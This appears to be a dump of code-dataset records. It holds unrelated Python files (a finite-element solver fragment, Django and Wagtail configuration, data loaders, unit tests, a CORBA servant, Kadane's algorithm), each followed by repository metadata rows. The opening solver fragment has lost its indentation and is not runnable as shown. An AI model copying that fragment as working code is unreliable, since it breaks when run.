F[element[e].unknown[term[t].equation]] += numpy.dot( A , numpy.prod(Y,axis=0) )
# add dense local jacobian to csr global jacobian
index = sum( nodegrid( J.p[sum(element[e].unknown,[])] , numpy.arange(0,L.i.shape[1]) ) ).flatten()
J.i[index] = L.i.flatten()
J.x[index] = L.x.flatten()
# return the global system
return [ scipy.sparse.csr_matrix((J.x,J.i,J.p)) , F ]
#------------------------------------------------------------------------------#
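# samples the polynomial solution on an n x n grid over each quadrilateral patch
# (element centre, face centre, node, face centre) and writes the values as
# gnuplot-style blocks of x y u_0 ... u_{nv-1}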
def write_display_file(display_filename,n):
nv = len(order)
np = numpy.array([ len(x) for x in element[0].unknown ])
Q = numpy.linalg.inv(numpy.array([[1,-1,-1,1],[1,1,-1,-1],[1,1,1,1],[1,-1,1,-1]]))
file = open(display_filename,'w')
for e in range(0,len(element)):
s,t = element_sequential_indices(e,element,face)
for i in range(0,len(element[e].face)):
quad = numpy.array( [ element[e].centre ,
face[element[e].face[s[i-1]]].centre ,
node[face[element[e].face[s[i]]].node[t[i]]].x ,
face[element[e].face[s[i]]].centre ] )
a = numpy.dot(Q,quad)
mesh = numpy.append( numpy.mgrid[0:n+1,0:n+1]*(2.0/n)-1.0 , numpy.zeros((nv,n+1,n+1)) , axis=0 )
mesh[0:2] = [ a[0,j] + a[1,j]*mesh[0] + a[2,j]*mesh[1] + a[3,j]*mesh[0]*mesh[1] for j in range(0,2) ]
for j in range(0,max(np)):
phi = basis(mesh[0],mesh[1],element[e],j,[0,0])
for v in numpy.arange(0,nv)[j < np]:
mesh[2+v] += u[element[e].unknown[v][j]]*phi
file.write( '\n\n'.join([ '\n'.join([ ' '.join(['%e']*(2+nv)) % tuple(mesh[:,i,j]) for j in range(0,n+1) ]) for i in range(0,n+1) ]) + '\n\n\n' )
file.close()
#------------------------------------------------------------------------------#
def write_data_file(data_filename):
file = open(data_filename,'wb')
pickle.dump({'node':node,'face':face,'element':element,'boundary':boundary,'order':order,'u':u},file,protocol=pickle.HIGHEST_PROTOCOL)
file.close()
################################################################################
path = sys.argv[1]
action = sys.argv[2].lower()
directory = os.path.dirname(path)
name = os.path.basename(path)
input_filename = directory + os.sep + name + '.input'
data_filename = directory + os.sep + name + '.data'
display_filename = directory + os.sep + name + '.display'
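# letters in the action string select processing stages:
# p = pre-process, r = re-apply boundaries, i = initialise, s = solve, d = display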
do = Struct(pre = 'p' in action , re = 'r' in action , init = 'i' in action , solve = 's' in action , display = 'd' in action )
#------------------------------------------------------------------------------#
if not do.pre:
with Timer('reading data from "%s"' % data_filename):
node,face,element,boundary,u,order = read_data_file(data_filename)
with Timer('reading input from "%s"' % input_filename):
input_data = read_input_file(input_filename)
if do.pre:
geometry_filename = directory + os.sep + input_data[0]
order = input_data[1]
if do.pre or do.re:
boundary = input_data[2]
if do.init:
initial = input_data[3]
if do.solve:
for i in range(0,len(boundary)): boundary[i].value = input_data[2][i].value
term = input_data[4]
wind = input_data[5]
iterations = input_data[6]
if do.display:
mesh_size = input_data[7]
with Timer('generating constants'):
(gauss_locations,gauss_weights,
hammer_locations,hammer_weights,
taylor_coefficients,taylor_powers,powers_taylor,
factorial) = generate_constants(order)
if do.pre:
with Timer('reading and processing geometry from "%s"' % geometry_filename):
node,face,element = read_geometry(geometry_filename)
with Timer('generating unknowns'):
u = generate_unknowns()
if do.pre or do.re:
with Timer('assigning boundaries to faces'):
assign_boundaries()
with Timer('calculating element matrices'):
calculate_element_matrices()
if do.init:
with Timer('initialising the unknowns'):
initialise_unknowns()
if do.solve:
with Timer('iterating',True):
index = [ numpy.zeros(u.shape,dtype=bool) for v in range(0,len(order)) ]
for e in range(0,len(element)):
for v in range(0,len(order)):
index[v][element[e].unknown[v]] = True
for i in range(0,iterations):
J,f = generate_system()
print ' ' + ' '.join([ '%.4e' % numpy.max(numpy.abs(f[i])) for i in index ])
u += scipy.sparse.linalg.spsolve(J,-f)
if do.display:
with Timer('saving display to "%s"' % display_filename):
write_display_file(display_filename,mesh_size)
if do.pre or do.re or do.init or do.solve:
with Timer('saving data to "%s"' % data_filename):
write_data_file(data_filename)
################################################################################
| 34.35 | 173 | 0.597982 | 4,825 | 29,541 | 3.605596 | 0.075855 | 0.033799 | 0.040927 | 0.018336 | 0.445824 | 0.348163 | 0.281773 | 0.200494 | 0.157901 | 0.140541 | 0 | 0.076295 | 0.157882 | 29,541 | 859 | 174 | 34.389988 | 0.623025 | 0.141194 | 0 | 0.203704 | 0 | 0 | 0.024306 | 0.000845 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.016667 | null | null | 0.009259 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
497d558f6807d6cee34934135fc08d3e5e24fbf5 | 487 | py | Python | server/apps/api/notice/migrations/0003_alter_event_priority.py | NikitaGrishchenko/csp-tender-hack-server | 56055f51bf472f0f1e56b419a48d993cc91e0f3a | [
"MIT"
] | null | null | null | server/apps/api/notice/migrations/0003_alter_event_priority.py | NikitaGrishchenko/csp-tender-hack-server | 56055f51bf472f0f1e56b419a48d993cc91e0f3a | [
"MIT"
] | null | null | null | server/apps/api/notice/migrations/0003_alter_event_priority.py | NikitaGrishchenko/csp-tender-hack-server | 56055f51bf472f0f1e56b419a48d993cc91e0f3a | [
"MIT"
] | null | null | null | # Generated by Django 3.2.9 on 2021-11-27 12:21
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('notice', '0002_auto_20211127_0236'),
]
operations = [
migrations.AlterField(
model_name='event',
name='priority',
            field=models.IntegerField(choices=[(1, 'Низкий приоритет'), (2, 'Средний приоритет'), (3, 'Высокий приоритет')], verbose_name='Приоритет'),  # choices: (1) low / (2) medium / (3) high priority; verbose_name: "Priority"
),
]
| 25.631579 | 151 | 0.616016 | 52 | 487 | 5.673077 | 0.769231 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.092643 | 0.246407 | 487 | 18 | 152 | 27.055556 | 0.711172 | 0.092402 | 0 | 0 | 1 | 0 | 0.229545 | 0.052273 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
497e1c5d29374050c770b786c91bc5c1ccabcd85 | 650 | py | Python | gdpr_assist/app_settings.py | mserrano07/django-gdpr-assist | 3c23d0aadadc676c128ef57aebc36570f3936ff1 | [
"BSD-3-Clause"
] | null | null | null | gdpr_assist/app_settings.py | mserrano07/django-gdpr-assist | 3c23d0aadadc676c128ef57aebc36570f3936ff1 | [
"BSD-3-Clause"
] | null | null | null | gdpr_assist/app_settings.py | mserrano07/django-gdpr-assist | 3c23d0aadadc676c128ef57aebc36570f3936ff1 | [
"BSD-3-Clause"
] | null | null | null | """
Settings
"""
from yaa_settings import AppSettings
class PrivacySettings(AppSettings):
# Name of the model attribute for a privacy definition
GDPR_PRIVACY_CLASS_NAME = "PrivacyMeta"
# Name of the model attribute for the privacy definition instance
GDPR_PRIVACY_INSTANCE_NAME = "_privacy_meta"
# Internal name for the GDPR log database
GDPR_LOG_DATABASE_NAME = "gdpr_log"
# Whether to write to log database during anonymisation.
GDPR_LOG_ON_ANONYMISE = True
# Disable anonymise_db command by default - we don't want people running it
# on production by accident
GDPR_CAN_ANONYMISE_DATABASE = False
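# Usage sketch (an assumption based on yaa-settings' convention of reading
# overrides from the Django settings module), e.g. in a project's settings.py:
#   GDPR_CAN_ANONYMISE_DATABASE = True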
| 28.26087 | 79 | 0.755385 | 87 | 650 | 5.413793 | 0.54023 | 0.059448 | 0.038217 | 0.059448 | 0.110403 | 0.110403 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 650 | 22 | 80 | 29.545455 | 0.905769 | 0.493846 | 0 | 0 | 0 | 0 | 0.101266 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
49850af7a6ca8eea66c58c865c235297d9610189 | 2,815 | py | Python | senti_analysis/data.py | hotbaby/sentiment-analysis | efb880870d905c4c02528d7d242ba06b90f0e259 | [
"MIT"
] | null | null | null | senti_analysis/data.py | hotbaby/sentiment-analysis | efb880870d905c4c02528d7d242ba06b90f0e259 | [
"MIT"
] | 2 | 2020-09-25T21:17:58.000Z | 2022-02-10T00:28:19.000Z | senti_analysis/data.py | hotbaby/sentiment-analysis | efb880870d905c4c02528d7d242ba06b90f0e259 | [
"MIT"
] | null | null | null | # encoding: utf8
import numpy as np
import pandas as pd
from collections import OrderedDict
from senti_analysis import config
from senti_analysis import constants
from senti_analysis.preprocess import (load_tokenizer, load_sentences,
encode_sentence, label_transform)
def load_data_set():
"""
Load data set.
:return: train_data_set, validation_data_set, test_data_set
"""
train_data_set = pd.read_csv(config.TRAIN_SET_PATH)
validation_data_set = pd.read_csv(config.VALIDATION_SET_PATH)
test_data_set = pd.read_csv(config.TEST_SET_PATH)
return train_data_set, validation_data_set, test_data_set
def x_data():
    tokenizer = load_tokenizer()
    train_sentences, val_sentences, test_sentences = load_sentences()
    x_train = encode_sentence(train_sentences, padding=True, max_length=config.MAX_SEQUENCE_LENGTH,
                              tokenizer=tokenizer)
    x_val = encode_sentence(val_sentences, padding=True, max_length=config.MAX_SEQUENCE_LENGTH,
                            tokenizer=tokenizer)
    return x_train, x_val
def load_val_data_set():
    tokenizer = load_tokenizer()
    train_sentences, val_sentences, test_sentences = load_sentences()
    x_val = encode_sentence(val_sentences, padding=True, max_length=config.MAX_SEQUENCE_LENGTH,
                            tokenizer=tokenizer)
    train_set = pd.read_csv(config.TRAIN_SET_PATH)
    val_set = pd.read_csv(config.VALIDATION_SET_PATH)
    _, y_val = transform_y_data(train_set, val_set, constants.COLS)
    return x_val, y_val
def transform_y_data(train_set, val_set, cols):
y_train = OrderedDict()
y_val = OrderedDict()
for col in cols:
y_train[col] = np.array(label_transform(train_set[col]))
y_val[col] = np.array(label_transform(val_set[col]))
return y_train, y_val
def y_data():
"""
generate y label data.
:return: train_label_data dict, validation_label_data dict
"""
train_set = pd.read_csv(config.TRAIN_SET_PATH)
val_set = pd.read_csv(config.VALIDATION_SET_PATH)
y_train, y_val = transform_y_data(train_set, val_set, constants.COLS)
return y_train, y_val
def validate_data():
val_set = pd.read_csv(config.VALIDATION_SET_PATH)
tokenizer = load_tokenizer()
train_sentences, val_sentences, test_sentences = load_sentences()
x_val = encode_sentence(val_sentences, padding=True,
max_length=config.MAX_SEQUENCE_LENGTH, tokenizer=tokenizer)
y_val = {}
for col in constants.COLS:
y_val[col] = np.array(label_transform(val_set[col]))
return x_val, y_val
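# Minimal usage sketch (assumes the CSVs referenced by `config` and a saved
# tokenizer exist; `model` stands in for any Keras-style multi-output model):
#   x_train, x_val = x_data()
#   y_train, y_val = y_data()
#   model.fit(x_train, [y_train[c] for c in constants.COLS],
#             validation_data=(x_val, [y_val[c] for c in constants.COLS]))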
| 30.597826 | 99 | 0.713677 | 395 | 2,815 | 4.693671 | 0.124051 | 0.045307 | 0.053398 | 0.071197 | 0.717907 | 0.696332 | 0.666127 | 0.651025 | 0.615965 | 0.615965 | 0 | 0.000446 | 0.204263 | 2,815 | 91 | 100 | 30.934066 | 0.827232 | 0.061101 | 0 | 0.462963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.111111 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
49882b0d53f39e7e8ebf679902e5c955c3e1b55f | 944 | py | Python | tests/inputs/config.py | hsh-nids/python-betterproto | f5d3b48b1aa49fd64513907ed70124b32758ad3e | [
"MIT"
] | 708 | 2019-10-11T06:23:40.000Z | 2022-03-31T09:39:08.000Z | tests/inputs/config.py | hsh-nids/python-betterproto | f5d3b48b1aa49fd64513907ed70124b32758ad3e | [
"MIT"
] | 302 | 2019-11-11T22:09:21.000Z | 2022-03-29T11:21:04.000Z | tests/inputs/config.py | hsh-nids/python-betterproto | f5d3b48b1aa49fd64513907ed70124b32758ad3e | [
"MIT"
] | 122 | 2019-12-04T16:22:53.000Z | 2022-03-20T09:31:10.000Z | # Test cases that are expected to fail, e.g. unimplemented features or bug-fixes.
# Remove from list when fixed.
xfail = {
"namespace_keywords", # 70
"googletypes_struct", # 9
"googletypes_value", # 9
"import_capitalized_package",
"example", # This is the example in the readme. Not a test.
}
services = {
"googletypes_response",
"googletypes_response_embedded",
"service",
"service_separate_packages",
"import_service_input_message",
"googletypes_service_returns_empty",
"googletypes_service_returns_googletype",
"example_service",
"empty_service",
}
# Indicate json sample messages to skip when testing that json (de)serialization
# is symmetrical because some cases legitimately are not symmetrical.
# Each key references the name of the test scenario and the values in the tuple
# are the names of the json files.
non_symmetrical_json = {"empty_repeated": ("empty_repeated",)}
| 32.551724 | 81 | 0.733051 | 119 | 944 | 5.605042 | 0.621849 | 0.014993 | 0.074963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005175 | 0.181144 | 944 | 28 | 82 | 33.714286 | 0.857697 | 0.444915 | 0 | 0 | 0 | 0 | 0.62768 | 0.348928 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.105263 | 0 | 0.105263 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4989cd340b09d2674ba44f9caf4ca76681a1034f | 1,476 | py | Python | examples/wagsley/wagsley/urls.py | Blogsley/blogsley | 0ca17397af5d53c2fac3affb5eacec2f8d941d37 | [
"MIT"
] | null | null | null | examples/wagsley/wagsley/urls.py | Blogsley/blogsley | 0ca17397af5d53c2fac3affb5eacec2f8d941d37 | [
"MIT"
] | null | null | null | examples/wagsley/wagsley/urls.py | Blogsley/blogsley | 0ca17397af5d53c2fac3affb5eacec2f8d941d37 | [
"MIT"
] | null | null | null | from django.conf import settings
from django.urls import include, path, re_path
from django.contrib import admin
from ariadne_django.views import GraphQLView
from wagtail.admin import urls as wagtailadmin_urls
from wagtail.core import urls as wagtail_urls
from wagtail.documents import urls as wagtaildocs_urls
from puput import urls as puput_urls
from search import views as search_views
from wagsley.schema import schema
# print(schema)  # stray debug output; importing a urls module should stay silent
urlpatterns = [
path('django-admin/', admin.site.urls),
path('admin/', include(wagtailadmin_urls)),
path('documents/', include(wagtaildocs_urls)),
#path('search/', search_views.search, name='search'),
]
if settings.DEBUG:
from django.conf.urls.static import static
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
# Serve static and media files from development server
urlpatterns += staticfiles_urlpatterns()
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
urlpatterns = urlpatterns + [
path('graphql/', GraphQLView.as_view(schema=schema), name='graphql'),
path('accounts/', include('accounts.urls')),
path('accounts/', include('django.contrib.auth.urls')),
path('accounts/', include('allauth.urls')),
path('events/', include('events.urls')),
re_path(r'^comments/', include('django_comments_xtd.urls')),
path("", include(puput_urls)),
path("", include(wagtail_urls)),
path('', include('home.urls')),
] | 28.941176 | 80 | 0.735095 | 186 | 1,476 | 5.72043 | 0.274194 | 0.067669 | 0.045113 | 0.043233 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.138889 | 1,476 | 51 | 81 | 28.941176 | 0.837136 | 0.071138 | 0 | 0 | 0 | 0 | 0.132117 | 0.035037 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.375 | 0 | 0.375 | 0.03125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
4989d46fdda2f05efd221caf77a2291b849c31f5 | 1,311 | py | Python | tests/unit/core/test_certify_timestamp.py | sys-git/certifiable | a3c33c0d4f3ac2c53be9eded3fae633fa5f697f8 | [
"MIT"
] | null | null | null | tests/unit/core/test_certify_timestamp.py | sys-git/certifiable | a3c33c0d4f3ac2c53be9eded3fae633fa5f697f8 | [
"MIT"
] | 311 | 2017-09-14T22:34:21.000Z | 2022-03-27T18:30:17.000Z | tests/unit/core/test_certify_timestamp.py | sys-git/certifiable | a3c33c0d4f3ac2c53be9eded3fae633fa5f697f8 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for `certifiable.core.certify_timestamp` method."""
import datetime
import unittest
from decimal import Decimal
from certifiable import CertifierTypeError
from certifiable.core import certify_timestamp
class CoreCertifyTimestampTestCase(unittest.TestCase):
"""Tests for `certifiable.core.certify_timestamp` method."""
def setUp(self):
"""Set up test fixtures, if any."""
def tearDown(self):
"""Tear down test fixtures, if any."""
def test_timestamp(self):
for i in [
datetime.datetime.utcnow(),
]:
self.assertIs(
certify_timestamp(
i,
required=True,
),
i,
)
def test_not_timestamp(self):
from tests import TestEnum1
for i in [
0,
True,
False,
3.4,
            5L,  # Python 2 'long' literal; this test suite targets Python 2
complex(6, 7),
Decimal(8),
datetime.date(2017, 11, 1),
TestEnum1.X,
]:
self.assertRaises(
CertifierTypeError,
certify_timestamp,
i,
required=True,
)
if __name__ == '__main__':
unittest.main()
| 22.220339 | 64 | 0.514111 | 122 | 1,311 | 5.393443 | 0.483607 | 0.121581 | 0.057751 | 0.069909 | 0.285714 | 0.136778 | 0.136778 | 0 | 0 | 0 | 0 | 0.021223 | 0.389016 | 1,311 | 58 | 65 | 22.603448 | 0.80025 | 0.032037 | 0 | 0.225 | 0 | 0 | 0.007449 | 0 | 0 | 0 | 0 | 0 | 0.05 | 0 | null | null | 0 | 0.15 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
498b4c183ee96795b8b620014ec7c0080e178c36 | 1,477 | py | Python | rtc_handle_example/replace/com_replace_impl.py | takashi-suehiro/rtmtools | 56ee92d3b3f2ea73d7fa78dfabe6a098e06f6215 | [
"MIT"
] | null | null | null | rtc_handle_example/replace/com_replace_impl.py | takashi-suehiro/rtmtools | 56ee92d3b3f2ea73d7fa78dfabe6a098e06f6215 | [
"MIT"
] | null | null | null | rtc_handle_example/replace/com_replace_impl.py | takashi-suehiro/rtmtools | 56ee92d3b3f2ea73d7fa78dfabe6a098e06f6215 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# -*- Python -*-
"""
\file com_replace_idl_examplefile.py
\brief Python example implementations generated from com_replace.idl
\date $Date$
"""
import omniORB
from omniORB import CORBA, PortableServer
import _GlobalIDL, _GlobalIDL__POA
class ComReplace_i (_GlobalIDL__POA.ComReplace):
"""
\class ComReplace_i
Example class implementing IDL interface ComReplace
"""
def __init__(self, repl_rtc):
"""
\brief standard constructor
Initialise member variables here
"""
self.rtc=repl_rtc
# int count_of_replaced_substring()
def replace_count(self):
#raise CORBA.NO_IMPLEMENT(0, CORBA.COMPLETED_NO)
# *** Implement me
# Must return: result
return self.rtc.repl_count
if __name__ == "__main__":
import sys
# Initialise the ORB
orb = CORBA.ORB_init(sys.argv)
# As an example, we activate an object in the Root POA
poa = orb.resolve_initial_references("RootPOA")
# Create an instance of a servant class
    servant = ComReplace_i(None)  # standalone demo: no RTC supplied (assumed OK since replace_count() is never called here)
# Activate it in the Root POA
poa.activate_object(servant)
# Get the object reference to the object
objref = servant._this()
# Print a stringified IOR for it
    print(orb.object_to_string(objref))
# Activate the Root POA's manager
poa._get_the_POAManager().activate()
# Run the ORB, blocking this thread
orb.run()
| 22.723077 | 69 | 0.666892 | 186 | 1,477 | 5.053763 | 0.505376 | 0.035106 | 0.031915 | 0.025532 | 0.031915 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001792 | 0.244414 | 1,477 | 64 | 70 | 23.078125 | 0.840502 | 0.47258 | 0 | 0 | 1 | 0 | 0.02149 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.222222 | 0.055556 | 0.444444 | 0.055556 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
498efc2d71a44fd1bc6d2b0987f9eff5df4001b1 | 1,192 | py | Python | src/pytornado/_util.py | airinnova/pytornado | 6127f45af60ab05f15b441bc134089a7e7a59669 | [
"Linux-OpenIB"
] | 16 | 2019-08-13T18:49:14.000Z | 2022-01-11T15:41:12.000Z | src/pytornado/_util.py | airinnova/pytornado | 6127f45af60ab05f15b441bc134089a7e7a59669 | [
"Linux-OpenIB"
] | 24 | 2019-09-11T14:48:01.000Z | 2022-03-18T08:17:52.000Z | src/pytornado/_util.py | airinnova/pytornado | 6127f45af60ab05f15b441bc134089a7e7a59669 | [
"Linux-OpenIB"
] | 5 | 2019-09-20T18:45:45.000Z | 2020-12-08T01:44:43.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------
# Copyright 2019-2020 Airinnova AB and the FramAT authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------
"""
Utils
"""
from numbers import Number
class Schemas:
any_int = {'type': int}
any_num = {'type': Number}
pos_int = {'type': int, '>': 0}
pos_number = {'type': Number, '>': 0}
string = {'type': str, '>': 0}
vector3x1 = {'type': list, 'min_len': 3, 'max_len': 3, 'item_types': Number}
vector6x1 = {'type': list, 'min_len': 6, 'max_len': 6, 'item_types': Number}
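# Illustrative values satisfying these schemas (examples only, not used by the code):
#   pos_int   -> 7
#   string    -> "wing"            (a non-empty str)
#   vector3x1 -> [0.0, 1.5, -2.0]  (a list of exactly 3 Numbers)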
| 34.057143 | 80 | 0.59396 | 155 | 1,192 | 4.503226 | 0.619355 | 0.08596 | 0.037249 | 0.045845 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025253 | 0.169463 | 1,192 | 34 | 81 | 35.058824 | 0.679798 | 0.645134 | 0 | 0 | 0 | 0 | 0.197995 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
4994cdca869fe06dd8910a681063b2822b7a3d86 | 2,122 | py | Python | diplom_test/data_reader.py | CrackedSTone/algorithm-detects-liver-pathology | d52d08e4e6931b3502f083f20d6332f7b6839a3b | [
"Apache-2.0"
] | 8 | 2019-04-09T07:11:26.000Z | 2020-02-27T16:51:26.000Z | diplom_test/data_reader.py | il-yanko/algorithm-detects-liver-pathology | d52d08e4e6931b3502f083f20d6332f7b6839a3b | [
"Apache-2.0"
] | null | null | null | diplom_test/data_reader.py | il-yanko/algorithm-detects-liver-pathology | d52d08e4e6931b3502f083f20d6332f7b6839a3b | [
"Apache-2.0"
] | 2 | 2019-04-04T07:13:02.000Z | 2020-02-06T04:58:34.000Z | import glob
import numpy as np
#import cv2
from PIL import Image
#import os.path
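# two thin directory loaders: ImgReader returns each image as an 8-bit grayscale
# array, DataReader returns each comma-separated numeric file as a float64 array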
class ImgReader:
def __init__(self):
pass
@staticmethod
def read_directory(dir_path, file_format=None):
try:
images = [np.asarray(Image.open(img_path).convert('L'), dtype=np.uint8)
for img_path in glob.glob(dir_path + "*" + (("." + file_format) if file_format else ""))]
print("It was loaded", len(images), "images from", dir_path)
return images
except Exception as e:
print(e)
return
class DataReader:
def __init__(self):
pass
@staticmethod
def read_directory(dir_path, file_format=None):
try:
images = [np.asarray(np.genfromtxt(img_path, delimiter=','), dtype=np.float64)
for img_path in glob.glob(dir_path + "*" + (("." + file_format) if file_format else ""))]
print("It was loaded", len(images), "datafiles from", dir_path)
return images
except Exception as e:
print(e)
return
# ALTERNATIVE LOADER:
'''
# process RGB/grayscale
def rgb_to_gray(rgb):
# scalar product of colors with certain theoretical coefficients according to the YUV system
return np.dot(rgb[..., :3], [0.299, 0.587, 0.114]).round(3).astype(int)
# download folder BMP
def get_all_bmp(full_dir):
# to calculate number of files in the folder
file_number = len(next(os.walk(full_dir))[2])
# print(fileNumber, "files were found")
img_arr = list()
for i in range(1, file_number + 1):
img_arr.append(cv2.imread(full_dir + '/' + str(i) + ".bmp"))
print(len(img_arr), "images were downloaded")
return img_arr
def get_all_img_make_gray(cwd, folder_name):
path = cwd + "/" + folder_name
print("\nPath = ", path)
img_arr = get_all_bmp(path)
for i in range(len(img_arr)):
img_arr[i] = rgb_to_gray(img_arr[i])
return img_arr
'''
# test load .csv
'''
import os.path
cwd = os.getcwd()
a = cwd + "/glcm/auh/csv/"
data = DataReader.read_directory(a)
print(data[0])
''' | 29.068493 | 111 | 0.615928 | 299 | 2,122 | 4.187291 | 0.384615 | 0.043131 | 0.035144 | 0.054313 | 0.340256 | 0.340256 | 0.340256 | 0.340256 | 0.340256 | 0.340256 | 0 | 0.014539 | 0.254477 | 2,122 | 73 | 112 | 29.068493 | 0.776865 | 0.027804 | 0 | 0.689655 | 0 | 0 | 0.05268 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.137931 | false | 0.068966 | 0.103448 | 0 | 0.448276 | 0.137931 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
499e8f87034a01b4664449514e2ad3632e9bb2a1 | 1,074 | py | Python | dp/kadane.py | williamsmj/prakhar1989-algorithms | 82e64ce9d451b33c1bce64a63276d6341a1f13b0 | [
"WTFPL"
] | 2,797 | 2015-01-01T15:52:13.000Z | 2022-03-28T20:52:37.000Z | dp/kadane.py | williamsmj/prakhar1989-algorithms | 82e64ce9d451b33c1bce64a63276d6341a1f13b0 | [
"WTFPL"
] | 35 | 2015-01-07T03:11:18.000Z | 2021-06-27T09:09:55.000Z | dp/kadane.py | williamsmj/prakhar1989-algorithms | 82e64ce9d451b33c1bce64a63276d6341a1f13b0 | [
"WTFPL"
] | 887 | 2015-01-02T06:38:19.000Z | 2022-03-26T20:33:11.000Z | """
Problem: The maximum subarray problem is the task of finding the
contiguous subarray within a one-dimensional array of numbers
(containing at least one positive number) which has the largest sum.
Solution:
The recurrence relation that we solve at each step is the following -
Let S[i] be the max value contiguous subsequence ending at the ith element
of the array.
Then S[i] = max(A[i], A[i] + S[i - 1])
At each step, we have two options
1) We add the ith element to the sum till the i-1th elem
2) We start a new array starting at i
We take a max of both these options and accordingly build up the array.
"""
def max_value_contiguous_subsequence(arr):
A = [arr[0]] + [0] * (len(arr) - 1)
max_to_here = arr[0]
for i in range(1, len(arr)):
A[i] = max(arr[i], arr[i] + A[i-1])
max_to_here = max(max_to_here, A[i])
return max_to_here
if __name__ == "__main__":
x = [-2, -3, 4, -1, -2, 1, 5, -3]
y = [-2, 1, -3, 4, -1, 2, 1, -5, 4]
z = [-1, 3, -5, 4, 6, -1, 2, -7, 13, -3]
    print(list(map(max_value_contiguous_subsequence, [x, y, z])))
